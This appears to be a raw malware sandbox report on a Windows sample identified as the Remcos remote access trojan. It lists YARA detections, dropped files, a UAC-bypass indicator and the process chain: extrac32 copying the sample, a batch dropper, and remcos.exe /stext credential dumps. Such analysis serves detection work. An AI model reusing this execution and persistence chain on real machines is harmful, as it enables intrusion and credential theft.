                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14ACE0CC
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AD61F0
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AC3946
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14ACE2FB
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AE332B
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AADB62
                      Source: Joe Sandbox View | Dropped File: C:\ProgramData\Remcos\remcos.exe E1CECFCC4EED2F4B74AF7D971DCF24555534DB164DDB0B7CD1E821B2F0402703
                      Source: Joe Sandbox View | Dropped File: C:\Users\Public\Libraries\Cmzcxhwn.PIF E1CECFCC4EED2F4B74AF7D971DCF24555534DB164DDB0B7CD1E821B2F0402703
                      Source: Joe Sandbox ViewDropped File: C:\Users\Public\Libraries\easinvoker.exe 30951DB8BFC21640645AA9144CFEAA294BB7C6980EF236D28552B6F4F3F92A96
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: String function: 14AC4E10 appears 54 times
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: String function: 02D66658 appears 32 times
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: String function: 02D64698 appears 156 times
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIFCode function: String function: 02D64824 appears 628 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 02DE44A0 appears 67 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 156B4770 appears 41 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 156B4E10 appears 54 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 15681E65 appears 35 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 02DE4698 appears 247 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 02DE6658 appears 32 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 02DE4824 appears 882 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 15682093 appears 50 times
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeCode function: String function: 02DF7BE8 appears 45 times
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 02DF4698 appears 156 times
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 02DF6658 appears 32 times
                      Source: C:\ProgramData\Remcos\remcos.exeCode function: String function: 02DF4824 appears 628 times
                      Source: netutils.dll.0.drStatic PE information: Number of sections : 19 > 10
                      Source: fu56fbrtn8.exeBinary or memory string: OriginalFilename vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1456766146.000000007F190000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1425865491.0000000002CE0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000003.1417481054.00000000150FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000003.1412139701.000000007F420000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000003.1411808310.000000007EC00000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameeasinvoker.exej% vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1437992219.0000000014090000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTruesight4 vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exe, 00000000.00000002.1428558383.0000000002E0B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameLOADER.EXEB vs fu56fbrtn8.exe
                      Source: fu56fbrtn8.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.raw.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 0.2.fu56fbrtn8.exe.15680000.10.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000000.00000002.1454185764.000000007E930000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian's recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                      Source: 00000000.00000002.1441963900.0000000015680000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows executables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                      Source: 00000011.00000002.1752157140.000000001515B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000008.00000002.1549703628.0000000014AFB000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: 00000010.00000002.1659495150.000000001514B000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: fu56fbrtn8.exe PID: 5592, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: Cmzcxhwn.PIF PID: 5652, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: remcos.exe PID: 4424, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: Process Memory Space: remcos.exe PID: 6012, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                      Source: C:\Users\Public\Libraries\CmzcxhwnO.bat, type: DROPPED | Matched rule: MALWARE_BAT_KoadicBAT author = ditekSHen, description = Koadic post-exploitation framework BAT payload
                      Source: classification engine | Classification label: mal100.rans.phis.troj.spyw.expl.evad.winEXE@27/17@5/3
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_15697952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Code function: 8_2_14AA7952 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DE7F90 GetDiskFreeSpaceA
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1568F474 GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_02DF6D84 CoCreateInstance
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569B4A8 FindResourceA,LoadResource,LockResource,SizeofResource
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Code function: 0_2_1569AC78 OpenSCManagerW,OpenServiceW,CloseServiceHandle,ChangeServiceConfigW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | File created: C:\Users\Public\Libraries\Null
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1484:120:WilError_03
                      Source: C:\ProgramData\Remcos\remcos.exe | Mutant created: \Sessions\1\BaseNamedObjects\Rmc-VLI916
                      Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3568:120:WilError_03
                      Source: C:\ProgramData\Remcos\remcos.exe | File created: C:\Users\user\AppData\Local\Temp\bhv2770.tmp
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\CmzcxhwnO.bat" "
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (2 entries)
                      Source: C:\ProgramData\Remcos\remcos.exe | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (8 entries)
                      Source: C:\Users\Public\Libraries\Cmzcxhwn.PIF | Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales (4 entries)
                      Source: C:\ProgramData\Remcos\remcos.exe | System information queried: HandleInformation
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | File read: C:\Users\user\Desktop\desktop.ini
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmp, remcos.exe, 0000000A.00000002.1530499601.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                      Source: remcos.exe, 00000009.00000002.1583187029.000000000270E000.00000004.00000020.00020000.00000000.sdmp, remcos.exe, 0000000D.00000002.1631665563.000000000290E000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                      Source: remcos.exe, 00000009.00000002.1579077199.0000000000400000.00000040.80000000.00040000.00000000.sdmp | Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                      Source: fu56fbrtn8.exe | ReversingLabs: Detection: 71%
                      Source: fu56fbrtn8.exe | Virustotal: Detection: 73%
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | File read: C:\Users\user\Desktop\fu56fbrtn8.exe
                      Source: unknown | Process created: C:\Users\user\Desktop\fu56fbrtn8.exe "C:\Users\user\Desktop\fu56fbrtn8.exe"
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\CmzcxhwnO.bat" "
                      Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Process created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\fu56fbrtn8.exe C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIF
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                      Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Users\Public\Libraries\Cmzcxhwn.PIF "C:\Users\Public\Libraries\Cmzcxhwn.PIF"
                      Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\kcrrhbu"
                      Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\uxwkztfesgm"
                      Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\fzkcamqygoemct"
                      Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cidefd"
                      Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\mkqxyvffd"
                      Source: C:\ProgramData\Remcos\remcos.exe | Process created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wevpzoqgrjkc"
                      Source: unknown | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                      Source: unknown | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                      Source: unknown | Process created: C:\Users\Public\Libraries\Cmzcxhwn.PIF "C:\Users\Public\Libraries\Cmzcxhwn.PIF"
                      Source: unknown | Process created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe"
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: archiveint.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: url.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: ieframe.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: netapi32.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: wkscli.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: netutils.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: amsi.dll (7 consecutive entries)
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: endpointdlp.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: eamsi.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: amsi.dll (5 consecutive entries)
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: smartscreenps.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exe | Section loaded: amsi.dll (29 consecutive entries)
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
